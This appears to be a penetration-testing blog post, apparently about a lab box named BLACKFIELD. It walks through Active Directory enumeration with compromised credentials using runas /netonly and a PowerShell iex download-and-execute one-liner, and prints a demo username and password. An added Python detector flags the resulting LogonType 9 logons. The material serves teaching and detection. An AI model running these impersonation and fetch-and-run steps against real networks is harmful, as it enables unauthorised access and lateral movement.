Enumerate Active Directory (AD) remotely with any valid user account credentials (runas and PsExec), lateral movement

n00🔑
3 min read · Dec 27, 2020

Method 1 (requires a Windows machine):

Prerequisite: credentials for at least one account you have compromised (support:#00^BlackKnight in this demo example).

Okay, let's check whether we can get RCE via SMB or via WinRM using CrackMapExec.

As you can see, we are not allowed to get RCE via SMB or via WinRM.

If you are allowed to run commands remotely, CrackMapExec will show Pwned!. Now, in a case like this, when you have exhausted enumerating LDAP, SMB, Kerberos etc. but didn't find anything interesting, we can impersonate a valid AD user using the runas command in Windows.

runas /netonly /user:BLACKFIELD.local\support powershell

runas /netonly /user:<FQDN>\<username> powershell

Impersonating user

Then we can run

iex (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/ADModule/master/Import-ActiveDirectory.ps1'); Import-ActiveDirectory
$dC = "<DC IP>"
Get-ADDomain -Server $dC

Then we can run SharpHound remotely to query AD information.
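From the blue-team side, the runas /netonly step above leaves a distinctive trace on the machine it is run from: the supplied credentials are never validated locally, so Windows records a NewCredentials logon (Security event 4624 with LogonType 9) for the target account, and with command-line auditing enabled a 4688 process-creation event for runas.exe carrying the /netonly switch. The script below is an added example, not code from the original post or from any of the tools it mentions; it runs over a small set of constructed event records (field names follow the 4624/4688 schema, values are made up) and flags LogonType 9 logons, noting whether a matching runas /netonly command line was seen for the same account.

```python
import re

# --- Constructed sample Security-log records --------------------------------
# Field names follow the Windows Security event schema (4688 process creation,
# 4624 logon); the values are made up for this example. In a real pipeline they
# would come from Get-WinEvent, a SIEM export or EVTX parsing.
SAMPLE_EVENTS = [
    {"EventID": 4688, "SubjectUserName": "jdoe",
     "NewProcessName": r"C:\Windows\System32\runas.exe",
     "CommandLine": r"runas /netonly /user:BLACKFIELD.local\support powershell"},
    # The NewCredentials logon that runas /netonly produces on the local host
    {"EventID": 4624, "LogonType": 9,
     "SubjectUserName": "jdoe", "SubjectDomainName": "WORKSTATION01",
     "TargetUserName": "support", "TargetDomainName": "BLACKFIELD.local"},
    # Ordinary interactive logon: must not be flagged
    {"EventID": 4624, "LogonType": 2,
     "SubjectUserName": "-", "SubjectDomainName": "-",
     "TargetUserName": "jdoe", "TargetDomainName": "WORKSTATION01"},
    # Ordinary network logon: must not be flagged
    {"EventID": 4624, "LogonType": 3,
     "SubjectUserName": "-", "SubjectDomainName": "-",
     "TargetUserName": "svc_backup", "TargetDomainName": "BLACKFIELD.local"},
]

_USER_RE = re.compile(r"/user:(\S+)", re.IGNORECASE)


def parse_runas_user(command_line):
    """Return (domain, user) from a runas command line, or None if no /user:.

    Accepts DOMAIN\\user and user@domain forms; domain is None when absent.
    """
    m = _USER_RE.search(command_line)
    if not m:
        return None
    value = m.group(1).strip('"')
    if "\\" in value:
        domain, user = value.split("\\", 1)
        return domain, user
    if "@" in value:
        user, domain = value.split("@", 1)
        return domain, user
    return None, value


def is_runas_netonly(event):
    """True for a 4688 record whose process is runas.exe launched with /netonly."""
    if event.get("EventID") != 4688:
        return False
    proc = event.get("NewProcessName", "").lower()
    cmd = event.get("CommandLine", "").lower()
    return proc.endswith("\\runas.exe") and "/netonly" in cmd


def find_netonly_impersonation(events):
    """Flag NewCredentials (LogonType 9) logons and note whether a matching
    runas /netonly command line was seen for the same target account."""
    runas_targets = set()
    for ev in events:
        if is_runas_netonly(ev):
            parsed = parse_runas_user(ev.get("CommandLine", ""))
            if parsed:
                runas_targets.add(parsed[1].lower())

    findings = []
    for ev in events:
        if ev.get("EventID") != 4624 or ev.get("LogonType") != 9:
            continue
        target_user = ev.get("TargetUserName", "")
        findings.append({
            "subject": f'{ev.get("SubjectDomainName")}\\{ev.get("SubjectUserName")}',
            "target": f'{ev.get("TargetDomainName")}\\{target_user}',
            "launched_by_runas_netonly": target_user.lower() in runas_targets,
        })
    return findings


if __name__ == "__main__":
    for finding in find_netonly_impersonation(SAMPLE_EVENTS):
        print(finding)
```

LogonType 9 logons are rare on ordinary workstations, so even without the 4688 correlation they are worth alerting on; the correlation mainly tells you which process started the impersonation. Note that the DC sees nothing until the impersonated token is actually used for a network call such as Get-ADDomain, at which point the DC logs a normal network logon (LogonType 3) for the target account, so host-side telemetry is the earlier signal.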
